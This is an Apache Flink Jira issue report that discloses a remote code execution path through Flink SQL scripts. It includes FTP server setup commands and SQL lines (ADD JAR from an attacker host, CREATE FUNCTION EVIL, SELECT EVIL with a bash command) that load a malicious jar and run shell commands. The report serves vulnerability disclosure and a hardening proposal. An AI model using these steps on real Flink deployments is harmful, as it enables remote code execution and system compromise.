gaoyu shi created FLINK-32221:
---------------------------------
Summary: Attacker can achieve Remote Code Execution when they can
control Flink SQL script content
Key: FLINK-32221
URL: https://issues.apache.org/jira/browse/FLINK-32221
Project: Flink
Issue Type: Bug
Environment: all version that support SQL Script.
Reporter: gaoyu shi
Attachments: image-2023-05-31-14-58-21-800.png,
image-2023-05-31-14-59-50-875.png
Flink SQL script has similiar syntax with tradition SQL, which means it also
suffer SQL injection vulnerbility.
Attacker can achieve Remote Code Execution when they can control part of whole
of the Flink SQL script content by following steps.
1. attacker develop an evil custom Scalar Function class and package it into
jar.
!image-2023-05-31-14-59-50-875.png|width=721,height=251!
2. run a ftp server on attacker host, and put the evil jar in it.
{code:java}
// install python-ftp-server tool
pip install python-ftp-server
// run ftp server
python3 -m python_ftp_server -d . --ip <public interface ip> -p password
// copy evil jar to current directory
cp <evil.jar-path> .{code}
3. Input the Flink SQL script to trigger code execution, which assumes that the
attacker can control part or whole of the Flink SQL script through SQL
injection or other method.
{code:java}
// transfer the evil jar from attacker host to victim
ADD JAR 'ftp://user:password@<attacker-ip>:60000/evil.jar';
// register the evil function into the SQL context
CREATE FUNCTION EVIL AS 'org.example.Evil';
// run any bash command
SELECT EVIL('<bash command>'); {code}
In summary, this vulnerbility allows attacker get remote code execution through
Flink SQL script. After looking at several websites that use flink, it is very
common to concat user input into Flink SQL statements, or even directly allow
users to enter arbitrary Flink SQL scripts to process data.
I allow that it is not a vulnerability to execute malicious code through
Flink's web interface to submit a malicious jar package, because developers
will hide Flink's web interface by default, such as only listening to
localhost. However, malicious code execution through Flink SQL scripts is
completely different. Currently, there is no hardening method or default
configuration that can prevent attackers from using Flink SQL to achieve
arbitrary code execution.
Suggestion:
'ADD JAR' command should not be able to load remote jar, or it should be
disable by default at least.
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
